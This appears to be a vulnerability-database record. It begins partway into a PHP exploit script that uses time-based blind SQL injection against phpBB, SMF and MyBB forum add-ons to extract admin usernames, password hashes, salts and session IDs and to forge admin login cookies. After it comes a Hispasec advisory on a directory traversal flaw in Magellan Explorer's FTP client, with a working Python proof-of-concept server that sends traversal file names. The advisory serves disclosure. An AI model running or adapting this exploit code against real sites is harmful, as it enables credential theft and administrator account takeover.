Exploit by: Coloss\r\n[i] Date: 06.07.2007\r\n[i] This is priv8 not for kids\\n\\n\";\r\n\r\n\r\nif ($opts[u] == '')\r\n die(help($argv[0]));\r\n\r\nif (!strncmp($opts[u], \"http\", 4))\r\n $url = $opts[u];\r\nelse\r\n $url = \"http://\".$opts[u];\r\n\r\nif ($opts[U])\r\n $user = $opts[U];\r\nif ($opts[P])\r\n $pass = $opts[P];\r\nif ($opts[f])\r\n $forum = $opts[f];\r\nif ($opts[m])\r\n $met = $opts[m];\r\nif ($opts[o])\r\n $file = $opts[o];\r\nif ($opts[d])\r\n $dir = $opts[d];\r\n\r\n$cookies = '';\r\n$delay = $min = $max = $mid = 0;\r\n$fld1 = $fld2 = '';\r\n\r\nif (!$forum)\r\n die(\"[X] You haven't specified any forum type!\\n\");\r\n\r\necho \"[+] Target: $url [$forum]\\n\\n\";\r\n\r\nexploit();\r\n\r\n\r\nfunction exploit_gallery ($f)\r\n{\r\n global $cookies, $url, $fld1, $fld2;\r\n $sql = get_sql($f);\r\n $str = \"NULL,\".$fld1.\",\".$fld2.\",NULL,NULL\";\r\n $req = sprintf($sql, $str);\r\n\r\n $u = $url.\"index.php?ind=gallery&op=edit_file&iden=\".urlencode($req);\r\n $html = Send($u, NULL, $cookies);\r\n if (strstr($html, \"ERROR: Database error\"))\r\n die(\"[X] SQL Query Error.. probably wrong table prefix\\n\");\r\n else if (strstr($html, \"<title>Error</title>\"))\r\n die(\"[X] This method failed. Try something else\\n\");\r\n\r\n $var1 = get_string($html,\"name=\\\"titolo\\\" value=\\\"\",\"\\\"\");\r\n $var2 = get_string($html,\"name=\\\"descrizione\\\" class=\\\"bgselect\\\">\",\"<\");\r\n\r\n return ($var1.\" \".$var2);\r\n}\r\n\r\nfunction get_delay ($cnt, $f, $u)\r\n{\r\n global $url, $cookies, $fld1, $fld2, $met;\r\n\r\n $sql = get_sql($f);\r\n\r\n if (strstr($met, \"gallery\"))\r\n $str = \"NULL,\".$fld1.\",\".$fld2.\",NULL,NULL\";\r\n else\r\n $str = $fld1;\r\n\r\n $inj = sprintf($sql, $str);\r\n\r\n if (strstr($inj, \"ORDER BY\")) {\r\n list($base, $order) = explode(\"ORDER BY\", $inj);\r\n $inj = $base.\"AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,1,BENCHMARK(%d,MD5(31337))) ORDER BY\". $order;\r\n }\r\n else\r\n $inj .= \" AND IF(ORD(SUBSTR(%s,%d,1))%s,1,BENCHMARK(%d,MD5(31337)))\";\r\n\r\n $req = sprintf($inj, $fld1, 1, \"=1\", $cnt);\r\n $u .= urlencode($req);\r\n\r\n $start = getmicrotime();\r\n Send($u, NULL, $cookies);\r\n $end = getmicrotime();\r\n\r\n $delay = intval(10 * ($end - $start));\r\n return $delay;\r\n}\r\n\r\nfunction get_normaldelay ($f, $u)\r\n{\r\n global $stcnt;\r\n\r\n $na = get_delay(1,$f,$u);\r\n $da = get_delay($stcnt,$f,$u);\r\n $nb = get_delay(1,$f,$u);\r\n $db = get_delay($stcnt,$f,$u);\r\n $nc = get_delay(1,$f,$u);\r\n $dc = get_delay($stcnt,$f,$u);\r\n\r\n $mean_delayed = intval(($da + $db + $dc) / 3);\r\n if ($mean_delayed < 2)\r\n die(\"Failed. The Answer was too rapid, probably you have not enough privileges\\n\");\r\n return $mean_delayed;\r\n}\r\n\r\nfunction exploit_blind ($sql, $u, $field)\r\n{\r\n global $cookies, $stcnt, $delay, $min, $max, $mid;\r\n\r\n $cnt = $stcnt * 4;\r\n\r\n echo \"[->] Trying to find value for '\".$field.\"'\\n\";\r\n\r\n for ($i = 1; $i < 51; $i++) {\r\n for ($j = $min; $j <= $max; $j++) {\r\n if ($j == $mid)\r\n $j = 97;\r\n $req = sprintf($sql, $field, $i, \"=$j\", $cnt);\r\n $ur = $u.urlencode($req);\r\n $start = getmicrotime();\r\n Send($ur, NULL, $cookies);\r\n $end = getmicrotime();\r\n\r\n $dtime = intval(10 * ($end - $start));\r\n if ($dtime > ($delay * 2)) {\r\n $out .= chr($j);\r\n echo \"[+] Current value for '\".$field.\"' (\".$i.\"): \".$out.\"\\n\";\r\n break;\r\n }\r\n if ($j == $max)\r\n $i = 41;\r\n }\r\n }\r\n if ($out)\r\n echo \"\\n[->] Found value for '\".$field.\"': \".$out.\"\\n\\n\";\r\n return $out;\r\n}\r\n\r\n\r\nfunction exploit_gallery_blind ($f)\r\n{\r\n global $fld1, $fld2, $url;\r\n\r\n $str = \"NULL,\".$fld1.\",\".$fld2.\",NULL,NULL\";\r\n $sql = get_sql($f);\r\n $inj = sprintf($sql, $str);\r\n\r\n $u = $url.\"index.php?ind=gallery&op=edit_file&iden=\";\r\n\r\n $var1 = exploit_init_blind($f, $u, $inj, $fld1);\r\n $var2 = exploit_init_blind($f, $u, $inj, $fld2);\r\n\r\n return ($var1.\" \".$var2);\r\n}\r\n\r\nfunction exploit_reviews ($f)\r\n{\r\n global $fld1, $fld2, $url;\r\n\r\n $u = $url.\"index.php?ind=reviews&op=update_file&iden=\";\r\n $sql = get_sql($f);\r\n\r\n $inj = sprintf($sql, $fld1);\r\n $var1 = exploit_init_blind($f, $u, $inj, $fld1);\r\n\r\n $inj = sprintf($sql, $fld2);\r\n $var2 = exploit_init_blind($f, $u, $inj, $fld2);\r\n\r\n return ($var1.\" \".$var2);\r\n}\r\n\r\nfunction exploit_init_blind ($f, $u, $inj, $field)\r\n{\r\n global $cookies, $delay, $fld1, $fld2, $mid;\r\n\r\n if (strstr($inj, \"ORDER BY\")) {\r\n list($base, $order) = explode(\"ORDER BY\", $inj);\r\n if ($mid == 58)\r\n $inj = $base.\"AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY\". $order;\r\n else\r\n $inj = $base.\"AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY\". $order;\r\n }\r\n else {\r\n if ($mid == 58)\r\n $inj .= \" AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1)\";\r\n else\r\n $inj .= \" AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1)\";\r\n }\r\n\r\n echo \"[->] Starting blind sql injection!\\n\";\r\n\r\n echo \"[+] Getting standard response delay... \";\r\n $delay = get_normaldelay($f,$u);\r\n echo $delay.\"ds\\n\\n\";\r\n\r\n $var = exploit_blind($inj, $u, $field);\r\n if (strstr($f, \"sid\") && !$var)\r\n die(\"[X] Probably there are more sid in the table.. so we cannot fetch it.. retry later.\\n\");\r\n\r\n return $var;\r\n}\r\n\r\nfunction get_data ($f)\r\n{\r\n global $met;\r\n\r\n switch ($met) {\r\n case 'reviews':\r\n $res = exploit_reviews($f); break;\r\n case 'gallery-blind':\r\n $res = exploit_gallery_blind($f); break;\r\n case 'gallery':\r\n $res = exploit_gallery($f); break;\r\n default:\r\n die(\"[X] Invalid exploit method specified\\n\");\r\n }\r\n return $res;\r\n}\r\n\r\nfunction phpbb_exploit ()\r\n{\r\n global $dir, $url, $user, $pass, $cookies, $forum, $exptime, $fld1, $fld2, $min, $max, $mid;\r\n\r\n if ($user && $pass) {\r\n echo \"[+] Logging in... \";\r\n\r\n $u = $url.$dir.\"login.php?login=true\";\r\n $post = \"username=\".$user.\"&password=\".$pass.\"&redirec=portalhome&submit=Login\";\r\n\r\n $html = Send($u, $post, NULL, TRUE);\r\n\r\n $lines = explode(\"\\n\", $html);\r\n\r\n foreach($lines as $line) {\r\n if (strstr($line, \"Set-Cookie\") && strstr($line, \"sid\")) {\r\n $cookies = get_string($line, \"Set-Cookie: \", \";\");\r\n $c++;\r\n }\r\n }\r\n if (!$cookies || $c < 2)\r\n die(\"Failed\\n\");\r\n echo \"Successfull\\n\\n\";\r\n }\r\n\r\n $fld1 = \"username\"; $fld2 = \"user_password\";\r\n $min = 48; $max = 122; $mid = 58;\r\n\r\n $res = get_data($forum);\r\n list($auesr, $apwd) = explode(\" \", $res);\r\n if ($auser && strlen($apwd) == 32) {\r\n owrite(\"\\n[+] Target: $url [$forum]\\n\");\r\n owrite(\"[->] Found admin username: '\".$auser.\"'\\n\");\r\n owrite(\"[->] Found admin hash password: '\".$apwd.\"'\\n\");\r\n }\r\n else\r\n die(\"[X] Failed to retrive informations\\n\");\r\n\r\n $fld1 = \"session_id\"; $fld2 = \"session_time\";\r\n $max = 102;\r\n\r\n $res = get_data($forum.\"_sid\");\r\n list($sid,$start) = explode(\" \", $res);\r\n if ($sid && strlen($sid) == 32) {\r\n $t = (int) (time() - $start - $exptime);\r\n if ($t >= 0)\r\n echo \"[!] Found admin sid ('\".$sid.\"') but it should not be valid anymore\\n\";\r\n else\r\n owrite(\"[->] Found admin sid: '\".$sid.\"' valid for ~\".abs($t).\"s\\n\");\r\n }\r\n else\r\n echo \"[!] No admin sid was found\\n\";\r\n}\r\n\r\nfunction smf_exploit ()\r\n{\r\n global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max;\r\n\r\n $base = 'a:4:{i:0;s:1:\"1\";i:1;s:40:\"%s\";i:2;i:1184000000;i:3;i:0;}';\r\n\r\n if ($user && $pass) {\r\n echo \"[+] Logging in... \";\r\n\r\n $u = $url.$dir.\"index.php?action=login2\";\r\n $post = \"user=\".$user.\"&passwrd=\".$pass.\"&cookieneverexp=on&submit=Login\";\r\n $html = Send($u, $post, NULL, TRUE);\r\n\r\n $lines = explode(\"\\n\", $html);\r\n foreach($lines as $line) {\r\n if (strstr($line, \"Set-Cookie\") && !strstr($line, \"PHPSESSID\"))\r\n $cookies = get_string($line, \"Set-Cookie: \", \";\");\r\n }\r\n if (!$cookies)\r\n die(\"Failed\\n\");\r\n echo \"Successfull\\n\\n\";\r\n }\r\n\r\n $fld1 = \"passwd\"; $fld2 = \"passwordSalt\";\r\n $min = 48; $max = 102; $mid = 58;\r\n\r\n $res = get_data($forum);\r\n list($pwd,$salt) = explode(\" \", $res);\r\n if ($pwd && strlen($pwd) == 40 && strlen($salt) == 4) {\r\n $pass = $pwd.$salt;\r\n $pass = sha1($pass);\r\n $cookie = sprintf($base, $pass);\r\n list($cname) = explode(\"=\", $cookies);\r\n owrite(\"\\n[+] Target: $url [$forum]\\n\");\r\n owrite(\"[+] Found admin cookie '\".$cname.\"': '\".urlencode($cookie).\"'\\n\");\r\n }\r\n else\r\n die(\"[X] Failed to retrive informations\\n\");\r\n}\r\n\r\nfunction mybb_exploit ()\r\n{\r\n global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max, $mid;\r\n\r\n if ($user && $pass) {\r\n echo \"[+] Logging in... \";\r\n\r\n $u = $url.$dir.\"member.php\";\r\n $post = \"username=\".$user.\"&password=\".$pass.\"&action=do_login&submit=Login\";\r\n $html = Send($u, $post, NULL, TRUE);\r\n\r\n $lines = explode(\"\\n\", $html);\r\n foreach($lines as $line) {\r\n if (strstr($line, \"Set-Cookie\") && !strstr($line, \"PHPSESSID\") && !strstr($line, \"[last\") && !strstr($line, \r\n\" sid=\")) {\r\n $cookies = get_string($line, \"Set-Cookie: \", \";\");\r\n }\r\n }\r\n if (!$cookies)\r\n die(\"Failed\\n\");\r\n echo \"Successfull\\n\\n\";\r\n }\r\n\r\n $fld1 = \"loginkey\"; $fld2 = \"username\";\r\n $min = 48; $max = 122; $mid = 91;\r\n\r\n $res = get_data($forum);\r\n list($key,$auser) = explode(\" \", $res);\r\n if ($key && strlen($key) == 50) {\r\n $cookie = sprintf($base, $pass);\r\n list($cname) = explode(\"=\", $cookies);\r\n owrite(\"\\n[+] Target: $url [$forum]\\n\");\r\n owrite(\"[+] Found admin cookie '\".$cname.\"': '1_\".$key.\"'\\n\");\r\n }\r\n else\r\n die(\"[X] Failed to retrive informations\\n\");\r\n\r\n $fld1 = \"password\"; $fld2 = \"salt\";\r\n\r\n $res = get_data($forum);\r\n list($apwd,$salt) = explode(\" \", $res);\r\n if ($apwd && strlen($apwd) == 32 && $salt && strlen($salt) == 8) {\r\n owrite(\"[+] Found admin hash password: '\".$apwd.\"'\\n\");\r\n owrite(\"[+] Found admin password salt: '\".$salt.\"'\\n\");\r\n }\r\n else\r\n echo \"[!] No admin sid was found\\n\";\r\n}\r\n\r\nfunction exploit ()\r\n{\r\n global $forum;\r\n\r\n switch ($forum) {\r\n case 'phpbb':\r\n phpbb_exploit(); break;\r\n case 'smf':\r\n smf_exploit(); break;\r\n case 'mybb':\r\n mybb_exploit(); break;\r\n default:\r\n die(\"Failed. Cannot handle this type of forum\\n\");\r\n }\r\n}\r\n\r\nfunction get_string ($str, $start, $end)\r\n{\r\n $res = substr($str, strpos($str, $start)+strlen($start),strpos(substr($str, strpos($str, \r\n$start)+strlen($start),strlen($str)), $end));\r\n return $res;\r\n}\r\n\r\nfunction get_sql ($var)\r\n{\r\n global $vars;\r\n\r\n for ($i = 0, $j = 1; $vars[$i]; $i++, $j++) {\r\n if ($vars[$i] == $var)\r\n return $vars[$j];\r\n }\r\n}\r\n\r\nfunction getmicrotime()\r\n{\r\n list($usec, $sec) = explode(\" \", microtime());\r\n return ((float)$usec + (float)$sec);\r\n}\r\n\r\nfunction Send($url, $post_fields='', $cookie = '', $headers = FALSE)\r\n{\r\n $ch = curl_init();\r\n $timeout = 120;\r\n\r\n curl_setopt ($ch, CURLOPT_URL, $url);\r\n curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);\r\n curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);\r\n\r\n if ($post_fields) {\r\n curl_setopt($ch, CURLOPT_POST, 1);\r\n curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);\r\n }\r\n\r\n curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);\r\n curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');\r\n\r\n if(!empty($cookie))\r\n curl_setopt ($ch, CURLOPT_COOKIE, $cookie);\r\n\r\n if($headers === TRUE)\r\n curl_setopt ($ch, CURLOPT_HEADER, TRUE);\r\n else\r\n curl_setopt ($ch, CURLOPT_HEADER, FALSE);\r\n\r\n curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);\r\n\r\n $fc = curl_exec($ch);\r\n curl_close($ch);\r\n\r\n return $fc;\r\n}\r\n\r\nfunction owrite ($msg)\r\n{\r\n global $file, $debug;\r\n\r\n echo $msg;\r\n\r\n if ($file) {\r\n if (!($h = fopen($file, 'ab')) && $debug) {\r\n echo \"[X] Cannot open '$file'\\n\";\r\n return;\r\n }\r\n if (fwrite($h, $msg) === FALSE && $debug)\r\n echo \"[X] Cannot write to '$file'\\n\";\r\n fclose($h);\r\n }\r\n}\r\n\r\nfunction help ($prog)\r\n{\r\n print \"[-] Usage: $prog\r\n -u <url> -> Sets Target url\r\n [-U] <user> -> Your username\r\n [-P] <hash> -> Your password\r\n [-f] <type> -> Sets Forum type (phpbb, smf or mybb)\r\n [-m] <method> -> Which method do you want to use (gallery or reviews)\r\n [-d] <dir> -> Sets forum subdirectory\r\n [-o] <file> -> Writes results to a file\\n\";\r\n}\r\n\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/2021"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:26", "bulletinFamily": "software", "description": "Directory traversal with filename obtained from FTP server.", "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "id": "SECURITYVULNS:VULN:8125", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8125", "title": "Total Commander / Unreal Commander / Magellan Explorer directory traversal", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "description": "HISPASEC\r\nSecurity Advisory\r\nhttp://blog.hispasec.com/lab/\r\n\r\nName : 2K7SEPT6 Magellan Explorer 3.32 build 2305 Remote FTP\r\nClient Directory Traversal\r\nClass : Remote Directory Traversal\r\nThreat level : HIGH\r\nDiscovered : 2007-08-14\r\nPublished : 2007-09-06\r\nCredit : Gynvael Coldwind\r\nVulnerable : 3.32 built 2305 and prior, other versions may be affected\r\n\r\n== Abstract ==\r\n\r\nEnriva Development Magellan Explorer is an award winning Windows file\r\nexplorer with a\r\nbuilt-in support for FTP protocol.\r\n\r\nMagellan Explorer fails to correctly handle file names on remote FTP servers\r\nwhile downloading them to a local drive. This may lead to a directory traversal\r\nif a malformed file name contains relative path.\r\nSuccessful exploitation may lead to a full scale system compromise.\r\n\r\n== Details ==\r\n\r\nThe FTP feature fails to correctly check the name of a file that is to be\r\ndownloaded. This filename can contain backslashes, slashes and dots, and these\r\ndots and backslashes will be used as a part of a local file name.\r\nAn example file list sent from the FTP server can look like this:\r\n-rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28\r\nst\..\..\..\..\..\BackSlashPoC\r\n-rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28\r\nst/../../../../../SlashPoC\r\nWhen the user chooses to download the file (or a directory in which this file\r\nexists), the Magellan Explorer will try to create the file on a local harddrive\r\nusing the dots and backslashes as a part of a name.\r\nSince more then enough \..\..\ will just bring the path to the disk root, the\r\nattacker can choose any location on the disk to write the file to. The file can\r\nfor example overwrite a critical system file, or create a file in the Autostart\r\nfolder.\r\n\r\nSee Proof of Concept exploit at the bottom of this advisory.\r\n\r\n== Vendor status and solution ==\r\n\r\nThe vendor has been informed and has released a new version (7.02) with this\r\nissue being fixed.\r\nIt is advised to upgrade Total Commander to the newest version availible.\r\n\r\n== Proof of Concept ==\r\n# python localhost ftp server\r\n# by Gynvael Coldwind\r\n\r\nimport socket\r\n\r\nTransferSock = 0\r\n\r\ndef sendDirList (sock):\r\n(DataSock, Address) = TransferSock.accept()\r\nprint "sendDirList: TransferSock accepted a connection"\r\nsock.send("150 Opening ASCII mode data connection for file list\r\n");\r\nDataSock.send("-rwxr-xr-x 2 ftp ftp 4096 Aug 1\r\n02:28 st\\..\\..\\..\\..\\..\\BackSlashPoC\n" +\r\n"-rwxr-xr-x 2 ftp ftp 4096 Aug 1 02:28\r\nst/../../../../../../SlashPoC\n");\r\nDataSock.close()\r\nsock.send("226 Transfer complete.\r\n");\r\nprint "sendDirList: Transfer complete\r\n"\r\n\r\ndef sendFile (sock):\r\n(DataSock, Address) = TransferSock.accept()\r\nprint "sendDirList: TransferSock accepted a connection"\r\nsock.send("150 Opening BINARY mode data connection for sth (5 bytes)\r\n");\r\nDataSock.send("Proof of Concept - Remote FTP Client directory\r\ntraversal vulnerability (G.C. - Hispasec)");\r\nDataSock.close()\r\nsock.send("226 Transfer complete.\r\n");\r\nprint "sendDirList: Transfer complete\r\n"\r\n\r\ndef handleUSER (sock, cmd, argz): sock.send("331 Password required for\r\nuser\r\n")\r\ndef handlePASS (sock, cmd, argz): sock.send("230 User logged in.\r\n")\r\ndef handleSYST (sock, cmd, argz): sock.send("215 UNIX Type: L8\r\n")\r\ndef handleFEAT (sock, cmd, argz): sock.send("211-Features:\r\n\r\nMDTM\r\n REST STREAM\r\n211 End\r\n");\r\ndef handleTYPE (sock, cmd, argz): sock.send("200 Type set to " + argz + "\r\n");\r\ndef handlePASV (sock, cmd, argz): sock.send("227 Entering Passive Mode\r\n(127,0,0,1,10,10)\r\n");\r\ndef handlePWD (sock, cmd, argz): sock.send("257 \"/ProofOfConcept\" is\r\ncurrent directory.\r\n")\r\ndef handleLIST (sock, cmd, argz): sendDirList(sock)\r\ndef handleQUIT (sock, cmd, argz):\r\nsock.send("Bye.\r\n")\r\nsock.close()\r\n\r\ndef handleRETR (sock, cmd, argz):\r\nif argz == "/":\r\nsendDirList(sock)\r\nelse:\r\nsendFile(sock)\r\n\r\ndef unknown (sock, cmd, argz): sock.send("550 " + cmd + ": Operation\r\nnot permitted\r\n")\r\n\r\nhandlers = {\r\n'USER': handleUSER,\r\n'PASS': handlePASS,\r\n'SYST': handleSYST,\r\n'FEAT': handleFEAT,\r\n'TYPE': handleTYPE,\r\n'PASV': handlePASV,\r\n'PWD': handlePWD,\r\n'LIST': handleLIST,\r\n'QUIT': handleQUIT,\r\n'RETR': handleRETR\r\n}\r\n\r\nControlSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nControlSock.bind(("127.0.0.1", 2021))\r\nControlSock.listen(1)\r\n\r\nTransferSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nTransferSock.bind(("127.0.0.1", 10 * 256 + 10))\r\nTransferSock.listen(10)\r\n\r\n# Control Sock loop\r\n(ClientSock, Address) = ControlSock.accept()\r\nClientSock.send("220 PoCFTPD 1.2.3.4 Server ready.\r\n");\r\nend = 0\r\n\r\nwhile not end:\r\ncmd = ClientSock.recv(1024)\r\nprint "Debug: recv -> " + cmd.strip()\r\ncommand = (cmd[0:4]).strip()\r\nargz = ((cmd.strip())[5:]).strip()\r\nhandlers.get(command, unknown)(ClientSock, command, argz)\r\n\r\n== Disclaimer ==\r\nThis document and all the information it contains is provided "as is",\r\nwithout any warranty. Hispasec Sistemas is not responsible for the\r\nmisuse of the information provided in this advisory. The advisory is\r\nprovided for educational purposes only.\r\n\r\nPermission is hereby granted to redistribute this advisory, providing\r\nthat no changes are made and that the copyright notices and\r\ndisclaimers remain intact.\r\n\r\nCopyright (C) 2007 Hispasec Sistemas.\r\n\r\n-- \r\nGynvael Coldwind\r\nmailto: gynvael AT vexillium DOT org\r\nmailto: michael AT hispasec DOT com\r\n", "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "id": "SECURITYVULNS:DOC:17951", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17951", "title": "[HISPASEC] 2K7SEPT6 Magellan Explorer 3.32 build 2305 Remote FTP Client Directory Traversal", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}